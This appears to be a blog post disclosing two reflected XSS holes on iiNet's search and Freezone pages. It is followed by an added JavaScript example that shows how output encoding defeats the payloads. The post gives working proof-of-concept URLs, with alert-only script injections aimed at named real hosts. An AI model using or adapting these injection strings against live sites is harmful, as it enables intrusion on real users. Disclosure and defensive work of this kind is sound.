iiNet, a major ISP in Australia, seems to be a little less secure than they claim to be. After merely 5 minutes of searching their website for XSS vulnerabilities, I found these two. Both are non-persistent, and one is, surprisingly, located in iiNet’s main search page.
Search page
Here is the main search page vulnerability:
Code:
http://www.iinet.net.au/search/?q=%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&search=Search&scope=site
Freezone page
This is another vulnerability on the iiNet Freezone main page:
Code:
http://freezone.iinet.net.au/index/search?searchValue="><script>alert(String.fromCharCode(88, 83, 83))</script>&submit.x=22&submit.y=15
I have reported the above vulnerabilities to iiNet and have gotten no response. Hopefully they will fix the vulnerabilities in the near future.
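How the two payloads above behave when reflected unencoded, and the output encoding that neutralises each, as an added example that is not part of the original post or iiNet's code. The two templates (a script-block string for `q`, an attribute value for `searchValue`) are assumptions inferred from the payload shapes, and all function names are hypothetical.

```javascript
// Added example: hypothetical templates, not iiNet's actual markup.
// Payloads are the decoded parameter values from the two URLs on this page.
const Q_PAYLOAD = decodeURIComponent(
  "%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E");
const SEARCHVALUE_PAYLOAD =
  '"><script>alert(String.fromCharCode(88, 83, 83))</script>';

// HTML attribute/body context: encode the five significant characters.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Script-block string context: JSON.stringify handles quotes and backslashes;
// then hide <, >, & and line separators so "</script>" can never appear.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Assumed reflection points (inferred from the payload shapes only).
function renderVulnerable(q, searchValue) {
  return `<script>var query = "${q}";</script>\n` +
         `<input name="searchValue" value="${searchValue}">`;
}

// Same template, with each value encoded for the context it lands in.
function renderSafe(q, searchValue) {
  return `<script>var query = ${jsStringLiteral(q)};</script>\n` +
         `<input name="searchValue" value="${escapeHtml(searchValue)}">`;
}

// Counts <script> opening tags an HTML parser would see in the output.
function scriptTagCount(html) {
  return (html.match(/<script\b/gi) || []).length;
}

console.log(renderVulnerable(Q_PAYLOAD, SEARCHVALUE_PAYLOAD));
console.log(renderSafe(Q_PAYLOAD, SEARCHVALUE_PAYLOAD));
```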